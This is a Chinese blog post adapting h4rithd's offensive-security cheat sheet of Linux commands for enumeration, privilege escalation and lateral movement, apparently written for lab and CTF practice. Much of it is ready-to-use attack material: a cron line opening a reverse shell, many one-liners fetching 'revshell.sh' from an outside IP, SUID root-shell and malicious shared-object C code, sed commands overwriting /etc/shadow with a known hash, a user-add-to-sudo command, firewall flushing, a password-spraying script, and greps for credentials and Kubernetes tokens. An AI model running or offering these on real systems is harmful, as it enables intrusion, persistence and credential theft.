Linux常用命令-横向移动-h4rithd-2024.04.03版本

笔记说明:

该笔记是国外进攻性爱好者 h4rithd 在 gitbook 上记录的备忘笔记,我整体翻译了注释的内容,并根据个人打靶学习情况,增加或删除了一部分内容,至此放置博客上留作后续复习使用,以及方便各位浏览到我博客的安全爱好者参考使用。

01.常用枚举

大部分命令摘自: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

01.1 操作系统枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
## ------------------| 操作系统详细信息
cat /etc/*-release
cat /proc/version
lsb_release -a
hostnamectl

## ------------------| 是否已加入域?
cat /etc/krb5.conf
kinit -k host/$(hostname -f)
realm list | grep active-directory
adcli testjoin

## ------------------| 内核版本
uname -a
uname --kernel-name --kernel-release --machine

## ------------------| SUDO版本
sudo -V 2>/dev/null | grep "Sudo ver"

## ------------------| 系统统计信息/磁盘信息
(df -h || lsblk) 2>/dev/null

## ------------------| 列出所有服务
(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null    

## ------------------| 装载的文件
(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "/ /|/null | proc proc |/dev/console"          

## ------------------| USB创建者?
busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator

## ------------------| ASLR已启用?
cat /proc/sys/kernel/randomize_va_space 2>/dev/null

## ------------------| 虚拟环境?
systemd-detect-virt
grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor

## ------------------| 搜索套接字文件
find / -type s 2>/dev/null

## ------------------| 具有功能的文件
getcap -r / 2>/dev/null

## ------------------| 设置文件的功能
sudo setcap cap_net_bind_service=+ep $(readlink -f /usr/bin/python3)

## ------------------| lxc容器内部?
cat /proc/1/environ

## ------------------| docker码头工人内部?
find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null

## ------------------| 枚举Docker套接字
find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null      
curl -s --unix-socket <socket_path> http://localhost/info

## ------------------| 枚举 Kubernetes 
### Kubernetes命名空间
cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null      
### Kubernetes token
cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null     
### Kubernetes服务帐户文件夹
ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null

01.2 用户枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
## ------------------| 列出用户的组
(id || (whoami && groups)) 2>/dev/null

## ------------------| 列出用户的权限
sudo -l

## ------------------| 列出所有用户
cat /etc/passwd | grep sh$ | awk -F: '{print $1}'

## ------------------| 超级用户
awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null

## ------------------| 具有控制台的用户
grep "sh$" /etc/passwd 2>/dev/null | sort 

## ------------------| 登录活动
### 当前登录
(w || who || finger || users) 2>/dev/null
### 最后登录
(last -Faiw || last) 2>/dev/null | tail
lastlog 2>/dev/null | grep -v "Never"

## ------------------| 密码策略
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null        

## ------------------| 更改用户密码
echo "h4rithd" | passwd --stdin <user>

## ------------------| 将新用户添加到sudo组
useradd -p $(openssl passwd -1 h4rithd) -m newadmin --groups sudo  

## ------------------| 创建具有给定id的用户组(&G)
sudo groupadd -g 2017 dummy
sudo useradd dummy -u 2017 -g 2017 -s /bin/bash

01.3 进程枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
## ------------------| 列出所有当前流程
ps -auxw | less -w
(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | grep --color=always -z root        

## ------------------| 列出属于当前用户的所有当前进程
ps -ef | grep $(whoami) | less -w

## ------------------| 二进制进程权限
ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER "            

## ------------------| 列出所有cron作业
grep "CRON" /var/log/cron.log
cat /etc/crontab
ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null 

## ------------------| 列出crontab中的文件
ls -al /var/spool/cron/crontabs/

## ------------------| 创建cron任务
* * * * *    root    bash -c 'bash -i >& /dev/tcp/<IP>/<Port> 0>&1'

## ------------------| 列出所有系统/计时器
watch -n 1 'systemctl list-timers'
systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" 
### 您可以通过获取服务路径
find /etc | grep <ACTIVATES>

01.4 网络枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
## ------------------| 列出IP地址
ifconfig
ip -c -a -h addrbash
cat /proc/net/fib_trie  | grep '|--'

## ------------------| 列出 ARP 表
arp -n
cat /proc/net/arp

## ------------------| 关闭当前端口连接
fuser -k 4444/tcp

## ------------------| 列出所有开放端口或隧道
netstat -anlp | grep LIST
(netstat -punta || ss -nltpu || netstat -anv) 2>/dev/null | grep -i listen

## ------------------| 在端口上获取什么服务
ps -ef | grep <PID>

## ------------------| 主机名、主机和DNS
cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null           

## ------------------| 网络和邻居
netstat -rn 2>/dev/null
(route || ip n || cat /proc/net/route) 2>/dev/null
(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null

## ------------------| 列出本地网络
ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\."     

## ------------------| 读取/proc中的网络地址
cat /proc/net/tcp | awk '{print $1,$2,$3,$4}'
### 0: 00000000:0016 00000000:0000 0A
### |      |      |      |      |   |--> connection state
### |      |      |      |      |------> remote TCP port number
### |      |      |      |-------------> remote IPv4 address
### |      |      |--------------------> local TCP port number
### |      |---------------------------> local IPv4 address
### |----------------------------------> number of entry

## ------------------| Perl script to decode the address at /proc/net/tcp
### Usage prel proc.pl 00000000 0016
#!/usr/bin/perl
my $hexip=$ARGV[0];
my $hexport=$ARGV[1];
print "hex: $hexip\n";
my @ip = map hex($_), ( $hexip =~ m/../g );
my $ip = join('.',reverse(@ip));
my $port = hex($hexport);
print "IP: $ip  PORT: $port\n"; 

## ------------------| 创建pcap文件
sudo tcpdump -i any -w /tmp/capture.pcap -v
sudo tcpdump -i any -w /tmp/capture.pcap -v -s0
sudo tcpdump -i any -w /tmp/capture.pcap -v icmp
sudo tcpdump -i any -w /tmp/capture.pcap -v port 21
sudo tcpdump -i any -w /tmp/capture.pcap -v not port 22
sudo tcpdump -i any -w /tmp/capture.pcap -v -s0 -nn port 80
  • egressbuster
1
2
3
4
5
6
7
8
9
10
11
12
## ------------------| Manual
### From my pc 
sudo tcpdump -i tun0 tcp[13]==2
### From compromise machine
nc -nzv -w 1 <MyIP> 1-1000

## ------------------| From TrustedSec Script
git clone https://github.com/trustedsec/egressbuster.git && cd egressbuster
### From my pc 
python3 egress_listener.py <your_local_ip> <interface_for_listener> 0.0.0.0/0 
### From compromise machine
python3 egressbuster.py <your_local_ip> 1-65536
  • IP表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
## ------------------| IPTable
### Active rules [need access]
iptables -L

### Using file
ls /etc/iptables/

### for IPV4
cat ls /etc/iptables/rules.v4

### for IPV6
cat ls /etc/iptables/rules.v6

### Remove all rules
iptables-save > /dev/shm/fbashirewall.rules
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEP

### OpenBSD (pf)
find /etc/authpf
/etc/authpf/authpf.conf
/etc/authpf/authpf.rules

01.5 文件/目录枚举

  • 常见的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
## ------------------| 列出具有高级选项的文件
ls -laSrh   # sort by size
ls -lacrh   # sort by change time
ls -laurh   # sort by access time
ls -laRh    # recursive ls
ls -latrh   # sort by date

## ------------------| 列表属性
lsattr <DirectoryName>

## ------------------| 获取文件访问控制列表
getfacl <DirectoryName>

## ------------------| 列出带有目录的文件
find . -type f -ls 2>/dev/null

## ------------------| 列出包含子目录的文件
find . -ls -type f 2>/dev/null

## ------------------| 列出所有具有行数的文件
find -type f -exec wc -l {} \; 2>/dev/null | sort -nr

## ------------------| 历史文件中有什么?
cat ~/.*history | less

## ------------------| 上次修改的文件
find $1 -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head
find $1 -type f -print0 | xargs -0 stat --format '%Y :%y %n' | sort -nr | cut -d: -f2- | head
  • SUID/SGID
1
2
3
4
5
6
7
8
## ------------------| 列出所有SUID二进制文件
### 正常搜索
find / -perm -4000 -ls 2>/dev/null
### 按日期排序
find / -perm -4000 -printf "%T@\t%Tc %6k KiB %p\n" 2>/dev/null | sort -n | cut -f 2-   

## ------------------| 列出所有SGID二进制文件
find / -perm -2000 -ls 2>/dev/null
  • 查找硬编码凭据。
1
2
3
4
export GREP_COLOR='1;37;41'
grep --color=always -RiE '(password|pwd|pass)' . --exclude=\*.{css,js,md} 2>/dev/null
grep --color=always -RiE '(password|pwd|pass)[[:space:]]*=[[:space:]]*[[:alpha:]]+' *  2>/dev/null
grep --color=always -Rnw '/' -ie "PASSWORD\|PASSWD" –color=always 2>/dev/null
  • 查找复杂的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
## ------------------| 列表文件属于当前组/用户
find / -user $(whoami) -ls 2>/dev/null
find / -group $(groups) -ls 2>/dev/null

## ------------------| 如果您在多个组中
for i in $(groups);do find / -group $i -ls 2>/dev/null | grep -v ' /proc\| /run\| /sys';done

## ------------------| 以上带有过滤器的命令
find / -user $(whoami) -ls 2>/dev/null | grep -v ' /proc\| /run\| /sys'
find / -group $(groups) -ls 2>/dev/null | grep -v ' /proc\| /run\| /sys'

## ------------------| 查找根目录可写文件夹
find / -writable -type d -ls 2>/dev/null
find / -perm -222 -type d -ls 2>/dev/null
find / -perm -o w -type d -ls 2>/dev/null

## ------------------| 查找根目录可执行文件夹
find / -perm -o x -type d -ls 2>/dev/null

## ------------------| 查找属于根目录而不是全局可读的可读文件
find / -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "/sys\|/boot\|/var\|/etc/\|/run"  

## ------------------| 列出所有具有权限/所有者[美化]的文件
find . -type f -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null | column -t

## ------------------| 查找在过去10天内修改的文件
find / -mtime 10 -ls 2>/dev/null

## ------------------| 查找过去10天内访问的文件
find / -atime 10 -ls 2>/dev/null

## ------------------| 查找在过去一小时(60分钟)内更改的文件
find / -cmin -60 -ls 2>/dev/null

## ------------------| 查找最后一小时(60分钟)内的文件访问
find / -amin -60 -ls 2>/dev/null 

## ------------------| 用户放置的二进制文件[有趣]
for i in /usr/sbin /usr/bin /sbin /bin; do ls -la --time-style=full $i | grep -v '000000000\|->' ; done    

## ------------------| 查找日期之间的修改文件。
find / -newermt "2021-11-21" ! -newermt "2021-12-21" -ls 2>/dev/null

## ------------------| 检查包含密码或用户名关键字的文件
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
grep --color=auto -rnw '/etc' -ie "PASSWORD" --color=always 2> /dev/null
grep --color=auto -rnw '/etc' -ie "USERNAME" --color=always 2> /dev/null

## ------------------| 检查ssh主机密钥值
ssh-keygen -l -E md5 -f /etc/ssh/ssh_host_rsa_key.pub
ssh-keygen -l -E md5 -f /etc/ssh/ssh_host_ecdsa_key.pub
  • 共享对象注入
1
strace /path/to/file 2>&1 | grep -iE "open|access|no such file"
  • 列出 noexec 挂载
1
mount | grep noexec
  • PATH环境变量
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
## ------------------| checking
strings /path/to/file
strace -v -f -e execve /path/to/file 2>&1 | grep exec
ltrace /path/to/file

## ------------------| Create vul file
int main() {
    setuid(0);
    system("/bin/bash -p");
}

## ------------------| Execute
PATH=.:$PATH /path/to/file

## ------------------| If bash < 4.2-048 we can inject to absolute path aswell.
strace -v -f -e execve /path/to/file 2>&1
function /path/to/service { /bin/bash -p; }
export -f /path/to/service
/path/to/file
  • 读取审核文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
## ------------------| If you are in adm group
aureport
aureport --help
aureport --tty

cat /var/log/auth.* | grep "Failed password"
cat /var/log/auth.* | grep -oE "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | uniq -c
cat /var/log/auth.* | grep "password" | grep -v 'Failed\|Invalid'
cat /var/log/auth.* | grep -i 'root\|user\|usern\|passw\|pass\|`$(whoami)`' | awk -F: '{print $5}' | sort | uniq -c 
cat /var/log/syslog* | grep -i 'root\|user\|`$(whoami)`\|cron' |awk -F: '{print $5}' | sort | uniq -c
awk '{if($6=="Failed"&&$7=="password"){if($9=="invalid"){ips[$13]++;users[$11]++}else{users[$9]++;ips[$11]++}}}END{for(ip in ips){print ip, ips[ip]}}' /var/log/auth.* | sort -k2 -rn     
awk '{if($6=="Failed"&&$7=="password"){if($9=="invalid"){ips[$13]++;users[$11]++}else{users[$9]++;ips[$11]++}}}END{for(user in users){print user, users[user]}}' /var/log/auth.* | sort -k2 -rn      

## ------------------| Grep username and password
sed -n 's/.*username=\([^&]*\).*password=\([^&]*\).*/\1:\2/p' logfile.txt
  • 恢复文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
## ------------------| Using foremost 
sudo apt-get install foremost 
mkdir /tmp/recov
sudo foremost -q -v -i /dev/sda1 -t <jpeg,txt,..> -o /tmp/recov

#-v  - 详细模式。将所有消息记录到屏幕
#-q  - 启用快速模式。在512字节的边界上执行搜索。
#-t  - 指定文件类型。(-t jpeg、pdf…)
#-d  - 启用间接块检测(对于UNIX文件系统)
#-i  - 指定输入文件(默认为stdin)
#-o  - 设置输出目录(默认为输出)
#-Q  - 启用安静模式。抑制输出消息。 

## ------------------| 使用lsof[在inode仍处于活动状态时有效]
lsof | grep -i deletedFile.txt
  • 解密 Mozilla Firefox 受保护的密码
1
2
3
git clone https://github.com/lclevy/firepwd.git

python firepwd.py -d /c/Users/..../Profiles/
  • ZipSlip 博览会
1
2
ln -s ../../../../../../etc/passwd document.pdf
zip expo.zip document.pdf

01.6 软件/包枚举

1
2
3
4
5
6
7
8
## ------------------| List all installed packages
dpkg -l

## ------------------| Search for compilers
dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"       

## ------------------| Mysql version
mysql --version 2>/dev/null

01.7 活动目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
## ------------------| 是否检查域已加入?
cat /etc/krb5.conf

## ------------------| 搜索凭据/票证
find / -name *.keytab 2>/dev/null

## ------------------| Request a TGT
kinit <User>@<Domain> -k -t domain.keytab

## ------------------| Check current tickets
klist

## ------------------| 请求子域控制器的CIFS票证
kvno cifs\/OPS-ChildDC

01.8 其他

  • 创建带有特殊字符的文件
1
touch -- 'echo | hello'
  • 通过替换文件更改root密码/etc/shadow
1
2
3
4
5
6
7
8
9
10
11
12
13
14
## ------------------| Create password 
openssl passwd -6 -salt h4rithd h4rithd123
### -1 --> MD5
### -5 --> SHA256
### -6 --> SHA512
### also you can use it with out salt flag

### Replace the password in /etc/shadow (h4rithd123)
$6$h4rithd$SjZ3XkShHfK9x1Rpn9RhhDH030H4cy.igvwhXGoAb93wEUM9AGR5fjR6ms/oqCqhkopN9Wj/ORX/SlUoaypYI0

sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1PASSWORD\3/g' /etc/shadow

## ------------------| one line : h4rithd123
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1$6$\/dij\/aLbpn4NJrUW$iNXC\/blQ8FP6.kgZmpazax0RNiKBRRVwTuH5e2UFaYUQo8XOKb9aQU8hM7.e2I3omzD4Mp4XRHHzk0B2txbBW\/\3/g' /etc/shadow
  • 下载文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
## ------------------| WGET
wget https://10.10.14.25/revshell.sh -O /tmp/revshell.sh

## ------------------| CURL
curl -o /tmp/revshell.sh https://10.10.14.25/revshell.sh

## ------------------| OpenSSL
### Create certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem     
### Stand up server
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/revshell.sh
### Download file
openssl s_client -connect 10.10.14.25:80 -quiet > revshell.sh

## ------------------| Bash (/dev/tcp)
### Connect to Target's Webserver
exec 3<>/dev/tcp/10.10.10.32/80
### HTTP GET Request
echo -e "GET /revshell.sh HTTP/1.1\n\n">&3
### Print the Response
cat <&3

## ------------------| PHP
### File_get_contents()
php -r '$file = file_get_contents("https://10.10.14.25/revshell.sh"); file_put_contents("revshell.sh",$file);'       
### Fopen()
php -r 'const BUFFER = 1024; $fremote = fopen("https://10.10.14.25/revshell.sh", "rb"); $flocal = fopen("revshell.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'      

## ------------------| Python
### Python2
import urllib
urllib.urlretrieve ("https://10.10.14.25/revshell.sh", "revshell.sh")
### Python3
import urllib.request
urllib.request.urlretrieve("https://10.10.14.25/revshell.sh", "revshell.sh")

## ------------------| Ruby
ruby -e 'require "net/http"; File.write("revshell.sh", Net::HTTP.get(URI.parse("https://10.10.14.25/revshell.sh")))'

## ------------------| Perl
perl -e 'use LWP::Simple; getstore("https://10.10.14.25/revshell.sh", "revshell.sh");'
  • LUKS 安装/卸载Linux统一密钥设置
1
2
3
4
5
6
7
# ------------------| Mount
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/
 
# ------------------| Unmount
sudo umount -l /mnt/
sudo cryptsetup luksClose backup
  • 有没有PAM-Wordle
1
2
3
4
5
6
# ------------------| Find so file
find / 2>/dev/null | grep wordle
find /{usr,etc} -type f -printf "%T+ %p\n" 2>/dev/null | grep -v '000'| grep so$

# ------------------| Find words
strings <file>

02.命令和脚本

02.1 命令

1
2
3
4
5
6
7
8
9
10
11
12
13
# ------------------| On Linux machine
### Check ip forwording is enabled 
sudo sysctl -a | grep ip_forward 
## if the value is 1 you are good!! if not execute following command
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
### IP Table rules
sudo iptables -A FORWARD -i tun0 -o eth0 -m state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o tun0 -j ACCEPT
sudo iptables -t nat -A POSTROUTING -s <eth0IP>/24 -o tun0 -j MASQUERADE

# ------------------| On Windows machine
rout add 10.10.10.0 mask 255.255.254.0 <linuxBox_eth0IP>
ping 10.10.10.2
  • 授予 SUID 至dashvi
1
2
3
4
5
6
7
8
9
10
11
12
sudo chmod u+s /bin/bash
sudo chmod u+s /bin/dash

sudo chmod 4755 $(which dash)

sudo cp /bin/dash /tmp/dash
sudo chmod 4555 /tmp/dash
sudo chown root /tmp/dash

/tmp/dash -p

sudo chmod 4755 $(readlink $(which vi))
  • 通过 SSH 复制文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
## ------------------| Syntax
scp <source> <destination>
# You can use /* to copy all

## ------------------| 要在登录到B时将文件从B复制到a,请执行以下操作:
scp /path/to/file username@a:/path/to/destination

## ------------------| 要在登录到a时将文件从B复制到a,请执行以下操作:
scp username@b:/path/to/file /path/to/destination

## ------------------| Alternates ---------------------
sudo apt-get install sshfs

## ------------------| Create an empty dir
mkdir /tmp/testdir 
### “链接”或“装载”这两个目录
sshfs user@server.com:/remote/dir /tmp/testdir 
### "unlink" the dirs
fusermount -u /home/user/testdir
umount mountpoint
diskutil unmount mountpoint

02.2 端口敲门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
## ------------------| Files
ls /etc/init.d/ | grep knock

## ------------------| 使用上面的文件,我们可以找到配置文件
/etc/default/knockd
/etc/knockd.conf

## ------------------| 配置文件如下所示。要打开端口22,我们需要敲击端口571、290和991     
[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

## ------------------| 使用nmap进行端口敲除
for i in 571 290 911; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 10.10.10.43 ; done

02.3 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash

spray() {
    users=$(awk -F: '{ if ($NF ~ /sh$/) print $1 }' /etc/passwd)
    for user in $users; do
        echo "$1" |timeout 2 su $user -c whoami 2>/dev/null
        if [[ $? -eq 0 ]]; then
            exit
        fi
    done
}

spray $1
  • 创建SUID sudo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// gcc -o sroot sroot.c
int main(void)
{
   setuid(0);
   setgid(0);
   printf("\n-----| by h4rithd.com |-----\n\n");
   system("/bin/bash -p");
}

// chown root:root /tmp/sroot; chmod 4755 /tmp/sroot
// or chmod u+s /bin/bash

// SUID = 4xxx filename
// SGID = 2xxx filename
// Both = 6xxx filename

// for i in {1..100}; do ls -al /tmp/sroot;date ;sleep .2; done
// watch -n 2 -d ls -l .
  • 过程监控器
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/bash

IFS=$'\n' # Loop by line

old_process=$(ps -eo command)

while true; do
    new_process=$(ps -eo command)
    diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
    sleep 1
    old_process=$new_process
done

# nano prcmon.sh
# chmod +x prcmon.sh; ./prcmon.sh
  • 睡眠 5 的列表文件
1
for i in {1..100}; do ls -al /tmp/sroot;date ;sleep 5; done
  • 平扫
1
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done; 
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash

ip=172.20.0

for i in $(seq 2 255);
do
    ping -c 1 -W 1 $ip.$i 1>/dev/null 2>&1
    if [[ $? -eq 0 ]];
    then
        echo "[+]  $ip.$i  - is Alive!"
    fi
done
  • 扫描实时端口
1
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null       
1
2
3
4
5
6
7
8
9
10
#!/bin/bash

ip=127.0.0.1

for port in $(seq 1 65535);
do
    timeout .1 bash -c "echo > /dev/tcp/$ip/$port" &&
        echo "[+]  $ip : $port  - is Open!"
done
echo "==========[ Finished ]============"
  • 共享对象外壳 (.so)
1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
 system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

## gcc -shared -o libcounter.so -fPIC libcounter.c

02.4 网络服务器

1
2
3
4
5
6
7
8
9
10
11
12
## ------------------| Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## ------------------| Ruby
ruby -run -ehttpd . -p8080

## ------------------| PHP
php -S 0.0.0.0:8080

## ------------------| Socat
socat TCP-LISTEN:8080,reuseaddr,fork

02.5 Sed命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
## ------------------| Remove new line 
sed -z 's/\n//g' filename

## ------------------| Insert text to the 1st line of a file 
sed '1 i addthisword' filename

## ------------------| Delete first characher each line 
sed 's/^..//' filename

## ------------------| Delete last characher each line 
sed 's/.$//g' filename

## ------------------| Delete last line or footer line or trailer line
sed '$d' file

## ------------------| Delete particular line
sed '2d' file

## ------------------| Delete range of lines
sed '2,4d' file

## ------------------| Delete lines other than the first line or header line
sed '1!d' file

## ------------------| Delete lines other than last line or footer line
sed '$!d' file

## ------------------| Delete lines other than the specified range
sed '2,4!d' file

## ------------------| Delete first and last line
sed '1d;$d' file

## ------------------| Delete empty lines or blank lines
sed '/^$/d' file

## ------------------| Delete lines that begin with specified character
sed '/^u/d' file

## ------------------| Delete lines that end with specified character
sed '/x$/d' file

## ------------------| Delete lines that contain a pattern
sed '/debian/d' file
学习笔记
#Offensive security #Common Linux commands #horizontal movement
Linux常用命令-横向移动-h4rithd-2024.04.03版本
https://sh1yan.top/2024/06/02/Common-Linux-commands-horizontal-movement-h4rithd-20240403/
作者
shiyan
发布于
2024年6月2日
许可协议